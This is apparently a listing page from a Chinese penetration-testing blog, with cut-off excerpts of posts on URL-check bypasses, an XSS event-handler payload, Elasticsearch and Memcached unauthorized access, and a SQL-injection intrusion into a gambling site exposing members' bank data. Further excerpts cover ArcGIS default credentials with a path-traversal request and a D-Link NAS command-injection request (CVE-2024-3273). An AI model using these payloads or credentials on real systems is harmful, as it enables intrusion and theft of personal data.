实战URL校验bypass:浅谈静态DNS解析姿势与CAS票据劫持案例
前言在URL跳转漏洞、CORS漏洞、PostMessage跨域漏洞、和SSRF漏洞的利用过程中,URL校验绕过是突破防御的关键环节。本文将试着简单回顾各类URL校验机制的缺陷与绕过,并重点介绍静态DNS解析(nip.io)另辟蹊径的绕过姿势 常见的绕过姿势仅校验是否包含合法域名假设后端校验代码是这样写的,只检查是否包含目标域名 12if re.search(r'trusted\.com', url): return...
从XSS到RCE的PC端利用链构建
前言先铺垫一下。笔者有一个习惯,懒得记各种命令和payload,手工渗透测试时,遇到比较长的payload的情况下,不想一个一个地去手敲命令,于是我之前就在github上想寻找一个类似于记事本的软件,但是最好和我的记录命令的需求适配,于是就找到了一位师傅写的开源项目,一个专门用来记录命令的记事本,一直沿用至今,很方便哈哈 偶然邂逅昨天,我在逛一些技术帖子的时候,看到一位大师傅分享的XSS payload,当时觉得这个payload我没咋见过捏,于是就想着来分析分析,我们看看这个payload妙在哪些地方? 1<input style=content-visibility:auto oncontentvisibilityautostatechange="alert(1)"> 1. 利用冷门事件,规避黑名单过滤 经典绕过手法,使用冷门事件规避黑名单,oncontentvisibilityautostatechange 是一个与 content-visibility...
Elasticsearch未授权访问
Elasticserch简介Elasticsearch 是一个开源的分布式搜索和分析引擎,基于 Apache Lucene 构建。它提供了一个分布式、多租户能力的全文搜索引擎,具有 HTTP Web 接口和无模式 JSON 文档。 应用场景 全文搜索:网站搜索、企业搜索等 日志和数据分析:ELK Stack (Elasticsearch, Logstash, Kibana) 应用性能监控 地理空间数据分析 安全分析 Elasticsearch未授权访问漏洞原理Elasticsearch服务在默认配置下没有启用身份验证机制,导致攻击者可以直接访问Elasticsearch的RESTful API接口,从而对数据进行非法操作。 漏洞危害 数据泄露:读取索引中的所有敏感数据 数据篡改:添加、修改或删除索引和文档 执行恶意脚本:通过Groovy脚本等执行系统命令 节点控制:操作集群设置,甚至关闭集群 植入勒索软件:删除或加密数据索要赎金 漏洞特征 默认端口 在 9200 运行 返回包内容中包含”You Know, for...
Memcached未授权漏洞
Memcached简介Memcached 是一个开源的、高性能的分布式内存缓存系统,主要用于加速动态Web应用程序(如数据库驱动网站)的响应速度。它通过将数据存储在内存中,减少对后端数据库的直接访问,从而显著提升数据读取速度。 核心特性 基于内存存储 数据存储在内存中,读写速度极快(微秒级响应)。 适合缓存临时性数据(如会话、热点数据)。 键值(Key-Value)存储 数据以简单的键值对形式存储(如 key: "user_123", value: "{name: 'Alice', age: 30}")。 键最大250字节,值默认最大1MB(可配置)。 典型应用场景 数据库查询缓存:缓存频繁访问的SQL结果。 会话存储(Session...
菠菜?那很坏了!菠菜渗透小通杀案例
前言公众号的粉丝、一位大师傅发来一个站,问我有没有兴趣试试,我点开一看,哇靠,这不是菠菜嘛,太坏了,必须渗透一下,于是有了这篇小通杀案例 初见端倪简单看了看各个功能点,大部分是一些静态展示内容,有少量的查询数据的功能,于是首先想到打SQL注入 直接来到一处查询功能点 输入admin,有数据正常回显 输入admin’,没有数据回显 抓个包看看 好家伙,狗运来了挡都挡不住,直接SQL报错了 经过手工测试发现没有waf,直接sqlmap跑可以了撒 到此,可以直接拿到整个数据库的全部数据,可以拿到后台管理员表,几个密码哈希值,5K+的姓名,会员号,银行卡号,初始密码,取款密码,资金流水等等数据 但是还不够,于是我进一步尝试getshell 经过漫长的测试发现: 目标是MySQL数据库 通过TP框架报错信息得到了网站根目录绝对路径 没有使用站库分离架构 目录没有写入文件权限 能够通过sqlmap获取sql-shell,但是数据库权限很低,只能执行一些有限的当前数据库的数据查询 对于MySQL,无非就两种常用的方式getshell,into...
不是哥们?北大被"RCE"了
前言团队的师傅突然发来一句,”要RCE北大了”,还配上了一个截图,是执行了ls /的全回显结果,卧槽,我直呼牛逼,当时就兴奋了,于是我那天晚上忙(耍)完也去对北大做了信息收集,想去找找看这位师傅所说的可以RCE的站点,后面确实被”RCE”了,觉得有点意思,于是有了这篇文章。 信息收集就不说了,收集下来几千条资产。根据那位师傅的描述,他说那个系统就是类似于”PTA”在线编程系统的,于是结合这个信息,对子域名进行了简单的排查,推测并快速定位到了某一个系统,点开一看,就是在线做一些编程题目的,那么八九不离十就是这个系统了 哟西,可以注册,黑客狂喜(bushi),注册一个测试账号 直接来到题目做题,因为这里做编程题,不就是能执行我们编写的代码嘛?根据那位师傅的截图,推测肯定是这里编写程序时可以执行系统命令导致的”RCE” 选一个最简单的经典hello word 预期的是这样子,输出一个”hello...
ArcGis漏洞
简介ArcGIS 是由 Esri(Environmental Systems Research Institute)开发的地理信息系统(GIS)软件系列,广泛应用于地图制作、空间分析、数据管理和可视化等领域。ArcGIS 提供了一套完整的工具,帮助用户收集、管理、分析和展示地理信息。 默认信息 端口:6080 后台地址:/arcgis/admin/ 后台密码:siteadmin/siteadmin 漏洞任意文件读取1234567GET /arcgis/manager/3370/js/../WEB-INF/web.xml HTTP/1.0Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36Accept:...
D-Link-NAS远程命令执行
简介D-Link NAS(网络附加存储)设备为家庭和小型企业提供了一种便捷的数据存储和共享解决方案 数据存储与备份:支持大容量硬盘,提供集中存储和自动备份功能。 文件共享:支持SMB/CIFS、NFS、FTP等协议,方便多用户访问。 远程访问:通过D-Link的mydlink服务,用户可远程访问和管理NAS数据。 多媒体支持:内置DLNA和UPnP AV媒体服务器,支持流媒体播放。 数据安全:支持RAID、密码保护和加密技术,确保数据安全。 漏洞CVE-2024-3273远程命令执行 fofa指纹:_fid=”hWN+yVVhLzKJaLkd/ITHpA==” payload:system={{base64_enc(cmd)}} 123456GET /cgi-bin/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&system=aWQ= HTTP/1.1Host: x.x.x.xUser-Agent:...